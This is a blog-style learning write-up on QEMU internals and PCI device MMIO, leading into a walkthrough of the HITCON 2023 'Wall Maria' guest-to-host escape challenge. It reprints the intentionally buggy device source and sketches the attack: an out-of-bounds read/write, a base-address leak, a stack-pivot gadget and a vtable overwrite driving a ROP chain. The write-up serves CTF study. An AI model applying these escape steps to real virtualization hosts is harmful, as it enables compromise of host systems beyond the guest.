# QEMU learning
## What is QEMU?
QEMU (a.k.a Quick Emulator) is an open-source emulator to interoperate with KVMs (Kernel-based Virtual Machines) and also used when to want run applications compiled in one architecture (e.g: arm) on another architecture (e.g: x86_64)
## Setup QEMU
Download
```bash
wget https://download.qemu.org/qemu-8.0.2.tar.xz
```
Install dependencies
```bash
sudo pip3 install ninja
sudo apt install libglib2.0-dev libgcrypt20-dev zlib1g-dev autoconf automake libtool bison flex libpixman-1-dev
```
Build
```shell
cd qemu-8.0.2
./configure --enable-debug && cd build && make -j`nproc`
```
## PCI devices
Learn to custom a PCI device
https://www.youtube.com/watch?v=MTUuymrutNw
```sh
./qemu-system-x86_64 -device help | grep "PCI" ─╯
name "cxl-downstream", bus PCI, desc "CXL Switch Downstream Port"
name "cxl-rp", bus PCI, desc "CXL Root Port"
name "cxl-upstream", bus PCI, desc "CXL Switch Upstream Port"
name "i82801b11-bridge", bus PCI
name "ioh3420", bus PCI, desc "Intel IOH device id 3420 PCIE Root Port"
name "pci-bridge", bus PCI, desc "Standard PCI Bridge"
name "pci-bridge-seat", bus PCI, desc "Standard PCI Bridge (multiseat)"
name "pcie-pci-bridge", bus PCI
name "pcie-root-port", bus PCI, desc "PCI Express Root Port"
name "pxb", bus PCI, desc "PCI Expander Bridge"
name "pxb-cxl", bus PCI, desc "CXL Host Bridge"
name "pxb-pcie", bus PCI, desc "PCI Express Expander Bridge"
name "vfio-pci-igd-lpc-bridge", bus PCI, desc "VFIO dummy ISA/LPC bridge for IGD assignment"
name "x3130-upstream", bus PCI, desc "TI X3130 Upstream Port of PCI Express Switch"
name "xio3130-downstream", bus PCI, desc "TI X3130 Downstream Port of PCI Express Switch"
name "ich9-usb-ehci1", bus PCI
name "ich9-usb-ehci2", bus PCI
name "ich9-usb-uhci1", bus PCI
name "ich9-usb-uhci2", bus PCI
name "ich9-usb-uhci3", bus PCI
name "ich9-usb-uhci4", bus PCI
name "ich9-usb-uhci5", bus PCI
name "ich9-usb-uhci6", bus PCI
name "nec-usb-xhci", bus PCI
name "pci-ohci", bus PCI, desc "Apple USB Controller"
name "piix3-usb-uhci", bus PCI
name "piix4-usb-uhci", bus PCI
name "qemu-xhci", bus PCI
name "usb-ehci", bus PCI
name "am53c974", bus PCI, desc "AMD Am53c974 PCscsi-PCI SCSI adapter"
name "cxl-type3", bus PCI, desc "CXL PMEM Device (Type 3)"
name "dc390", bus PCI, desc "Tekram DC-390 SCSI adapter"
name "ich9-ahci", bus PCI, alias "ahci"
name "lsi53c810", bus PCI
name "lsi53c895a", bus PCI, alias "lsi"
name "megasas", bus PCI, desc "LSI MegaRAID SAS 1078"
name "megasas-gen2", bus PCI, desc "LSI MegaRAID SAS 2108"
name "mptsas1068", bus PCI, desc "LSI SAS 1068"
name "nvme", bus PCI, desc "Non-Volatile Memory Express"
name "piix3-ide", bus PCI
name "piix4-ide", bus PCI
name "pvscsi", bus PCI
name "sdhci-pci", bus PCI
name "vhost-scsi-pci", bus PCI
name "vhost-scsi-pci-non-transitional", bus PCI
name "vhost-scsi-pci-transitional", bus PCI
name "vhost-user-blk-pci", bus PCI
name "vhost-user-blk-pci-non-transitional", bus PCI
name "vhost-user-blk-pci-transitional", bus PCI
name "vhost-user-fs-pci", bus PCI
name "vhost-user-scsi-pci", bus PCI
name "vhost-user-scsi-pci-non-transitional", bus PCI
name "vhost-user-scsi-pci-transitional", bus PCI
```
Check device in a given qemu, we can see lots of PCI devices.
If you need additional information, check [PCI](https://en.wikipedia.org/wiki/Conventional_PCI)
Basically, PCI devices are local buses that attach hardware devices, equip new features for hypervisor.
We can interact with PCI devices using 2 methods:
- MMIO (Memory-mapped I/O)
- PMIO (Port-mapped I/O)
With MMIO, we can use assembly intructions like `mov` to communicate with host, and `in/out` if it is `PMIO`.
In my blog we will mainly use `MMIO` as a means of communication.
```sh
00:00.0 Host bridge: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX Host bridge (rev 01)
00:01.0 PCI bridge: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX AGP bridge (rev 01)
00:07.0 ISA bridge: Intel Corporation 82371AB/EB/MB PIIX4 ISA (rev 08)
00:07.1 IDE interface: Intel Corporation 82371AB/EB/MB PIIX4 IDE (rev 01)
00:07.3 Bridge: Intel Corporation 82371AB/EB/MB PIIX4 ACPI (rev 08)
00:07.7 System peripheral: VMware Virtual Machine Communication Interface (rev 10)
00:0f.0 VGA compatible controller: VMware SVGA II Adapter
00:10.0 SCSI storage controller: Broadcom / LSI 53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI (rev 01)
00:11.0 PCI bridge: VMware PCI bridge (rev 02)
00:15.0 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.1 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.2 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.3 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.4 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.5 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.6 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.7 PCI bridge: VMware PCI Express Root Port (rev 01)
00:16.0 PCI bridge: VMware PCI Express Root Port (rev 01)
```
In many hypervisors escape such as `QEMU`, `VMWare`, `Virtualbox`, we will principally take advantage of those PCI devices to achieve guest-to-host escape.
## Memory API
https://www.qemu.org/docs/master/devel/memory.html
The `qemu` memory mapped region will be initializied using the [memory_region_init_io](https://elixir.bootlin.com/qemu/v8.0.2/source/softmmu/memory.c#L1530)
`hwaddr` is a special data type, which is types of address in this space, being decomposed into pages.
https://android.googlesource.com/platform/external/qemu.git/+/master/docs/QEMU-MEMORY-MANAGEMENT.TXT
It would allow qemu to perform I/O operations from guest to host and vice versa
## HITCON 2023 - Wall Maria
Check the initialization of qemu, some considerable things:
I modify `run.sh` a little to run it on local:
```bash
#!/bin/bash
./qemu-system-x86_64 \
-L ./bios \
-kernel ./bzImage \
-initrd ./initramfs.cpio.gz \
-cpu kvm64,+smep,+smap \
-monitor none \
-m 1024M \
-monitor /dev/null \
-append "console=ttyS0 oops=panic panic=1 quiet nokpti nokaslr" \
-nographic \
-no-reboot \
-net user -net nic -device e1000 \
-device maria \
-enable-kvm \
-s
```
I you should get familiar with debugging kernel stuffs first, because this could serve as a fundamental background to understand virtualization stuffs. Check [this blog](https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/) so that
Alike Linux kernel exploit, we will be given a bash script to run a kernel emulated by `qemu`.
Again some options that you should pay attention to
- `-L bios` specifies the directory for `BIOS`, `VGA-bios` and `keymaps`
- `-initrd initramfs.cpio.gz` to specify the compressed file system including root directory.
- `-enable-kvm` to accelerate `QEMU` by allowing usage of `kvm` from the host.
- `-device maria` specifies the device enabled for running `QEMU`.
- `-s` to make gdb attach to port 1234, if we want to debug from kernel
More information about kvm
If you want to enable kvm on VMWare, do as the following picture

Then, disable Hyper-V by running `bcdedit /set hypervisorlaunchtype off`, in powershell with admin privilege, then reboot.
If you use WSL, you can enable `nested virtualization`, check [this site](https://serverfault.com/questions/1043441/how-to-run-kvm-nested-in-wsl2-or-vmware)
If successful, `/dev/kvm` will exist and you can use the command `kvm-ok` to check the status of kvm.

**Source code**
```c
#include "hw/hw.h"
#include "hw/pci/msi.h"
#include "hw/pci/pci.h"
#include "qapi/visitor.h"
#include "qemu/main-loop.h"
#include "qemu/module.h"
#include "qemu/osdep.h"
#include "qom/object.h"
#define TYPE_PCI_MARIA_DEVICE "maria"
#define MARIA_MMIO_SIZE 0x10000
#define BUFF_SIZE 0x2000
typedef struct {
PCIDevice pdev;
struct {
uint64_t src;
uint8_t off;
} state;
char buff[BUFF_SIZE];
MemoryRegion mmio;
} MariaState;
DECLARE_INSTANCE_CHECKER(MariaState, MARIA, TYPE_PCI_MARIA_DEVICE)
static uint64_t maria_mmio_read(void *opaque, hwaddr addr, unsigned size) {
MariaState *maria = (MariaState *)opaque;
uint64_t val = 0;
switch (addr) {
case 0x00:
cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 1);
val = 0x600DC0DE;
break;
case 0x04:
val = maria->state.src;
break;
case 0x08:
val = maria->state.off;
break;
default:
val = 0xDEADC0DE;
break;
}
return val;
}
static void maria_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) {
MariaState *maria = (MariaState *)opaque;
switch (addr) {
case 0x00:
cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 0);
break;
case 0x04:
maria->state.src = val;
break;
case 0x08:
maria->state.off = val;
break;
default:
break;
}
}
static const MemoryRegionOps maria_mmio_ops = {
.read = maria_mmio_read,
.write = maria_mmio_write,
.endianness = DEVICE_NATIVE_ENDIAN,
.valid = {
.min_access_size = 4,
.max_access_size = 4,
},
.impl = {
.min_access_size = 4,
.max_access_size = 4,
},
};
static void pci_maria_realize(PCIDevice *pdev, Error **errp) {
MariaState *maria = MARIA(pdev);
memory_region_init_io(&maria->mmio, OBJECT(maria), &maria_mmio_ops, maria, "maria-mmio", MARIA_MMIO_SIZE);
pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &maria->mmio);
}
static void maria_instance_init(Object *obj) {
MariaState *maria = MARIA(obj);
memset(&maria->state, 0, sizeof(maria->state));
memset(maria->buff, 0, sizeof(maria->buff));
}
static void maria_class_init(ObjectClass *class, void *data) {
DeviceClass *dc = DEVICE_CLASS(class);
PCIDeviceClass *k = PCI_DEVICE_CLASS(class);
k->realize = pci_maria_realize;
k->vendor_id = PCI_VENDOR_ID_QEMU;
k->device_id = 0xDEAD;
k->revision = 0x0;
k->class_id = PCI_CLASS_OTHERS;
set_bit(DEVICE_CATEGORY_MISC, dc->categories);
}
static void pci_maria_register_types(void) {
static InterfaceInfo interfaces[] = {
{ INTERFACE_CONVENTIONAL_PCI_DEVICE },
{ },
};
static const TypeInfo maria_info = {
.name = TYPE_PCI_MARIA_DEVICE,
.parent = TYPE_PCI_DEVICE,
.instance_size = sizeof(MariaState),
.instance_init = maria_instance_init,
.class_init = maria_class_init,
.interfaces = interfaces,
};
type_register_static(&maria_info);
}
type_init(pci_maria_register_types)
```
For a qemu escape challenges, or in some CVEs related to `Virtualbox` and `VMWare`, our target is to exploit the vulnerable device compiled when building `QEMU`. There could be VGA devices, network cards, disk controllers, so on
A custom device called `maria` is implemented, so let's dig deeper and figure out the bug.

You can check the device `maria` by using `lspci` in the given kernel.

So where is the `device maria`?
Check those lines, then read the source code of `QEMU`
```c
k->vendor_id = PCI_VENDOR_ID_QEMU;
k->device_id = 0xDEAD;
```
That means the last line in the output is the `maria` device.

Here in the directory `/sys/devices/pci0000:00/0000:00:05.0`, information about the `maria` device is stored here.

So to interact with the devices, we will focus on some files with format `resourceX`, with X can be >= 0.

If we try to `cat` or `echo`, it would fail. Instead of using traditional I/O, we can use `mmap` for these `sysfs` resources.
```c
uint32_t mmio_read(uint32_t addr) {
return *(uint32_t *)(mmio_mem + addr);
}
int main(){
int fd = open("/sys/devices/pci0000:00/0000:00:05.0/resource0", O_RDWR | O_SYNC);
if (fd < 0){
errExit("Open /sys/devices/pci0000:00/0000:00:05.0/resource0 failed");
}
mmio_mem = mmap(NULL, PAGE_SIZE * 4, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
if (mmio_mem == MAP_FAILED){
errExit("mmio");
}
mmio_read(0);
}
```
Why we need `O_SYNC` flag in `open`? As changes memory mapped region can immediately change the content of file, this flag allows us to send `"signals"` to underlying hardware and flush the file, guaranteed uncached data in memory mapped region.
https://stackoverflow.com/questions/72115837/when-does-o-sync-have-an-effect
### BUG
```c
static uint64_t maria_mmio_read(void *opaque, hwaddr addr, unsigned size) {
MariaState *maria = (MariaState *)opaque;
uint64_t val = 0;
switch (addr) {
case 0x00:
cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 1);
val = 0x600DC0DE;
break;
case 0x04:
val = maria->state.src;
break;
case 0x08:
val = maria->state.off;
break;
default:
val = 0xDEADC0DE;
break;
}
return val;
}
static void maria_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) {
MariaState *maria = (MariaState *)opaque;
switch (addr) {
case 0x00:
cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 0);
break;
case 0x04:
maria->state.src = val;
break;
case 0x08:
maria->state.off = val;
break;
default:
break;
}
}
```
```c
typedef struct {
PCIDevice pdev;
struct {
uint64_t src;
uint8_t off;
} state;
char buff[BUFF_SIZE];
MemoryRegion mmio;
} MariaState;
```
`cpu_physical_memory_rw` is a special function, whose function is similar to `memcpy`, but whether `rdi` or `rsi` is src or dest depends on the 4th param. Its two first params are physical address, not virtual address.
To know more about physical address and virtual address, you can see [GVA and GPA](https://www.geeksforgeeks.org/memory-allocation-techniques-mapping-virtual-addresses-to-physical-addresses/)
Indeed, we cannot use virtual address anymore to interact, but through `hardware address` or `hwaddr`.
The 3rd param, which is `BUFF_SIZE`, is fixed and equals to the size of `buff`. Trying to increase `maria.off` will lead to `oob read/write` in both `read` and `write` function.
**Notes: We are trying to exploit a single program, so being accustomed to pwning userland binary is definitely a prerequisite, as we will use C to exploit the device, which must be harder compared to python.**
### OOB Read/Write
First, I need to hit the breakpoint in `maria_mmio_read` and `maria_mmio_write`.
```c
mmio_write(0x0, 0x0);
```

Breakpoint hit!
Let's check what we can leverage
```sh
pwndbg> ptype /o maria
type = struct {
/* 0 | 2592 */ PCIDevice pdev;
/* 2592 | 16 */ struct {
/* 2592 | 8 */ uint64_t src;
/* 2600 | 1 */ uint8_t off;
/* XXX 7-byte padding */
/* total size (bytes): 16 */
} state;
/* 2608 | 8192 */ char buff[8192];
/* 10800 | 272 */ MemoryRegion mmio;
/* total size (bytes): 11072 */
} *
```
#### OOB Read
It will copy from `buff[8192]` until enough `0x2000` bytes, and after `buff` there is `MemoryRegion mmio`
[MemoryRegion definition](https://elixir.bootlin.com/qemu/v8.0.2/source/include/exec/memory.h#L753)


Address highlighted in blue is `heap`, containing the struct `Maria`, while the one highlighted in red and write are qemu base address.
Leaking qemu base address is ez, so let's find out how to write.
#### OOB Write
```c
static const MemoryRegionOps maria_mmio_ops = {
.read = maria_mmio_read,
.write = maria_mmio_write,
.endianness = DEVICE_NATIVE_ENDIAN,
.valid = {
.min_access_size = 4,
.max_access_size = 4,
},
.impl = {
.min_access_size = 4,
.max_access_size = 4,
},
};
```

As `sandbox` is enabled, `fork` and `execve` are all blacklisted,
`maria_mmio_ops` works like a vtable function pointers. As such, if we try to interact through memory mapped region, it will base on this function pointer.
So instead of calling those functions, replace it with our `stack pivot` gadget.
Also, because of `opaque` stored in `rax` where it jumps into the entry function, this gadget would be the most perfect
```
0x00000000007bce54 : push rax ; pop rsp ; nop ; pop rbp ; ret
```
From here, we can build a `orw` payload, or `ROP` to `mprotect` and jump to our shellcode.
### Exploit
First set offset to 0xf0, then read some stuffs behind buff
```c
void set_off(uint32_t value) {
mmio_write(0x08, value);
}
set_off(0xf0);
```
Then, set `src` to a physical address whose virtual address is called by mmap to `read` and `write` into.
To find physical address of an arbitrary virtual address, open pagemap and lseek to see the address
https://www.kernel.org/doc/Documentation/vm/pagemap.txt
http://www.phrack.org/issues/70/5.html
### Another problem?
`char buff[0x200]` is larger than a page size, which is only 0x1000. So problem occurs here
If we try to mmap a region with a size `0x2000`, when converted to a physical memory, will be mapped into different pages. This will make our read buffers wrong, as it is not the consecutive pages.
**How to deal with this?**
```
/root # cat /proc/meminfo
MemTotal: 992864 kB
MemFree: 897008 kB
MemAvailable: 892184 kB
Buffers: 0 kB
Cached: 72104 kB
SwapCached: 0 kB
Active: 11372 kB
Inactive: 61200 kB
Active(anon): 11372 kB
Inactive(anon): 61200 kB
Active(file): 0 kB
Inactive(file): 0 kB
Unevictable: 0 kB
Mlocked: 0 kB
SwapTotal: 0 kB
SwapFree: 0 kB
Dirty: 0 kB
Writeback: 0 kB
AnonPages: 492 kB
Mapped: 1908 kB
Shmem: 72104 kB
KReclaimable: 9328 kB
Slab: 15576 kB
SReclaimable: 9328 kB
SUnreclaim: 6248 kB
KernelStack: 732 kB
PageTables: 156 kB
SecPageTables: 0 kB
NFS_Unstable: 0 kB
Bounce: 0 kB
WritebackTmp: 0 kB
CommitLimit: 496432 kB
Committed_AS: 73608 kB
VmallocTotal: 34359738367 kB
VmallocUsed: 980 kB
VmallocChunk: 0 kB
Percpu: 228 kB
HugePages_Total: 0
HugePages_Free: 0
HugePages_Rsvd: 0
HugePages_Surp: 0
Hugepagesize: 2048 kB
Hugetlb: 0 kB
DirectMap4k: 20352 kB
DirectMap2M: 1028096 kB
/root #
```
We have two ways
- Allocating multiple pages, then try to find the physical address of each page to see if any of them are linear.
- Set hugepages
To allow system to manage large blocks of memory,
`hugepage` can be modified.
https://infohub.delltechnologies.com/en-US/l/day-two-best-practices-10/red-hat-enterprise-linux-hugepages-2/
```bash
sysctl -w vm.nr_hugepages=40
```
To modify number of hugepages in the system.
After leaking, overwrite `mmio_ops` and `opaque` with our crafted vtable pointers and our ROP chain, respectively.
**Before**

**After**



### Summary
A baby qemu escape challenge to get interested in a great amount of shitty code. Learn a lot about how to interact with PCI devices and exploit it, hopefully to grasp more about networking and VGA card.
## Reference
https://elixir.bootlin.com/qemu/v8.0.2/source
https://airbus-seclab.github.io/qemu_blog/pci.html
https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/09/03/kvm-mmio
https://www.qemu.org/docs/master/devel/memory.html
https://burgers.io/pci-access-without-a-driver
https://kb.vmware.com/s/article/2057914
https://www.kernel.org/doc/Documentation/vm/pagemap.txt
http://www.phrack.org/issues/70/5.html